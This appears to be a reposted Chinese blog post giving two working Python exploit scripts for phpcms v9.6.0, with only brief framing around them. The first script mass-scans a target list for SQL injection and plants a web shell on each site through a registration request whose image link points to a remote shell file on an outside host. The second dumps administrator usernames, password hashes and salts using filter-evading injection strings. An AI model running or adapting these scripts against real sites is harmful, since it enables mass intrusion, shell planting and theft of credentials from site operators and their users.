![图片[2]-phpcmsV9.6.0注入+前台getshell-华盟网](https://www.77169.net/wp-content/uploads/2017/10/pcms-678x381.png "pcms")
背景就稍微说下,Yan牛发现撞了洞,一时生气便发出来已经流传很久的phpcmsv9.6.0前台getshell漏洞。看到chamd5团队发的文时,复现了下,贴点代码上来,顺便回应下法师说的多写博客=。=
直接贴代码会比较好点:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
|
# phpcms v9.6.0 sqli and getshell
# code by : whoam1
# blog : http://www.cnnetarmy.com
import requests
import random
import string
import hashlib
import re
import threading
def sqli(host):
try:
url1 = ‘{}/index.php?m=wap&c=index&a=int&siteid=1’.format(host)
s =requests.Session()
req = s.get(url1)
flag = ”.join([random.choice(string.digits) for _ in range(2)])
flag_hash = hashlib.md5(flag).hexdigest()
url2 = ‘{}/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28md5%28{}%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26’.format(host,flag)
cookie = requests.utils.dict_from_cookiejar(s.cookies)
cookies = re.findall(r“siteid’: ‘(.*?)'”,str(cookie))[0]
data = {“userid_flash”:cookies}
r = s.post(url=url2,data=data)
a_k = r.headers[‘Set-Cookie’][61:]
url3 = ‘{}/index.php?m=content&c=down&a_k={}’.format(host,a_k)
if flag_hash[16:] in s.get(url3).content:
print ‘[*] SQL injection Ok!’
else:
print ‘[!] SQL injection ERROR.’
except:
print ‘requests error.’
pass
def getshell(host):
try:
url = ‘%s/index.php?m=member&c=index&a=register&siteid=1’ % host
flag = ”.join([random.choice(string.lowercase) for _ in range(8)])
flags = ”.join([random.choice(string.digits) for _ in range(8)])
headers = {
‘Accept’:‘text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8’,
‘Accept-Encoding’:‘gzip, deflate’,
‘Accept-Language’:‘zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3’,
‘Upgrade-Insecure-Requests’:‘1’,
‘Content-Type’: ‘application/x-www-form-urlencoded’,
‘User-Agent’:‘Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0’}
data = “siteid=1&modelid=11&username={}&password=ad{}min&email={}@cnnetarmy.com&info%5Bcontent%5D=%3Cimg%20src=http://www.cnnetarmy.com/soft/shell.txt?.php#.jpg>&dosubmit=1&protocol=”.format(flag,flags,flag)
r = requests.post(url=url,headers=headers,data=data,timeout=5)
#print r.content
shell_path = re.findall(r‘lt;img src=(.*?)>’,str(r.content))[0]
print ‘[*] shell: %s | pass is: cmd’ % shell_path
with open(‘sql_ok.txt’,‘a’)as tar:
tar.write(shell_path)
tar.write(‘\n’)
except:
print ‘requests error.’
pass
if __name__ == ‘__main__’:
#sqli(‘http://127.0.0.1/phpcms960/install_package’)
#getshell(‘http://127.0.0.1/phpcms960/install_package’)
tsk = []
f = open(‘target.txt’,‘r’)
for i in f.readlines():
url = i.strip()
t = threading.Thread(target = sqli,args = (url,))
tsk.append(t)
for t in tsk:
t.start()
t.join(0.1)
|
另附上luan表哥的另一个脱裤脚本:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
import requests,sys,urllib
url = sys.argv[1]
print ‘Phpcms v9.6.0 SQLi Exploit Code By Luan’
sqli_prefix = ‘%*27an*d%20’
sqli_info = ‘e*xp(~(se*lect%*2af*rom(se*lect co*ncat(0x6c75616e24,us*er(),0x3a,ver*sion(),0x6c75616e24))x))’
sqli_password1 = ‘e*xp(~(se*lect%*2afro*m(sel*ect co*ncat(0x6c75616e24,username,0x3a,password,0x3a,encrypt,0x6c75616e24) fr*om ‘
sqli_password2 = ‘_admin li*mit 0,1)x))’
sqli_padding = ‘%23%26m%3D1%26f%3Dwobushou%26modelid%3D2%26catid%3D6’
setp1 = url + ‘/index.php?m=wap&a=index&siteid=1’
cookies = {}
for c in requests.get(setp1).cookies:
if c.name[–7:] == ‘_siteid’:
cookie_head = c.name[:6]
cookies[cookie_head+‘_userid’] = c.value
cookies[c.name] = c.value
print ‘[+] Get Cookie : ‘ + str(cookies)
setp2 = url + ‘/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=’ + sqli_prefix + urllib.quote_plus(sqli_info, safe=‘qwertyuiopasdfghjklzxcvbnm*’) + sqli_padding
for c in requests.get(setp2,cookies=cookies).cookies:
if c.name[–9:] == ‘_att_json’:
sqli_payload = c.value
print ‘[+] Get SQLi Payload : ‘ + sqli_payload
setp3 = url + ‘/index.php?m=content&c=down&a_k=’ + sqli_payload
html = requests.get(setp3,cookies=cookies).content
print ‘[+] Get SQLi Output : ‘ + html.split(‘luan$’)[1]
table_prefix = html[html.find(‘_download_data’)–2:html.find( ‘_download_data’)]
print ‘[+] Get Table Prefix : ‘ + table_prefix
setp2 = url + ‘/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=’ + sqli_prefix + urllib.quote_plus(sqli_password1, safe=‘qwertyuiopasdfghjklzxcvbnm*’) + table_prefix + urllib.quote_plus(sqli_password2, safe=‘qwertyuiopasdfghjklzxcvbnm*’) + sqli_padding
for c in requests.get(setp2,cookies=cookies).cookies:
if c.name[–9:] == ‘_att_json’:
sqli_payload = c.value
print ‘[+] Get SQLi Payload : ‘ + sqli_payload
setp3 = url + ‘/index.php?m=content&c=down&a_k=’ + sqli_payload
html = requests.get(setp3,cookies=cookies).content
print ‘[+] Get SQLi Output : ‘ + html.split(‘luan$’)[1]
|
本程序遵守随机性,使用时请无损验证,完整地址:http://www.cnnetarmy.com/soft/phpcmsv9.6_sqli+getshell.py
作者whoam1(QQ:2069698797),出自:http://www.cnnetarmy.com/
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容